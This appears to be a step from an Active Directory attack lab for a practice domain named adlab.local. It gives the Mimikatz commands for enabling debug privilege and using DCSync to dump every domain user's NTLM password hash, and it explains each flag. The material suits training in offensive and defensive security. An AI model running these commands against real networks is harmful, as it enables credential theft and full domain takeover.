Now that you have administrative access to the Domain Controller, run Mimikatz to dump all the password hashes stored in Active Directory.
-
Run Mimikatz:
In cmd, use:
%USERPROFILE%\mimikatz\x64\mimikatz.exe
In PowerShell, use
& $HOME\mimikatz\x64\mimikatz.exe
-
Enable Privilege Debugging: Once Mimikatz is running, enable the necessary privileges to access sensitive memory locations:
privilege::debug
-
Dump All AD Hashes Using DCSync: Execute the DCSync command to dump the password hashes for all users in the domain:
lsadump::dcsync /domain:adlab.local /all /csv
Explanation:
lsadump::dcsync
: Extracts password hashes from the Domain Controller without touching the disk./domain:adlab.local
: Specifies the target domain./all
: Dumps password hashes for all domain users./csv
: Outputs the results in CSV format for easy processing.
The output will include all user account details, including their NTLM password hashes, which you can use for further attacks or analysis.
With all the domain hashes at your disposal, you effectively control the entire network, completing the objective of gaining full domain dominance.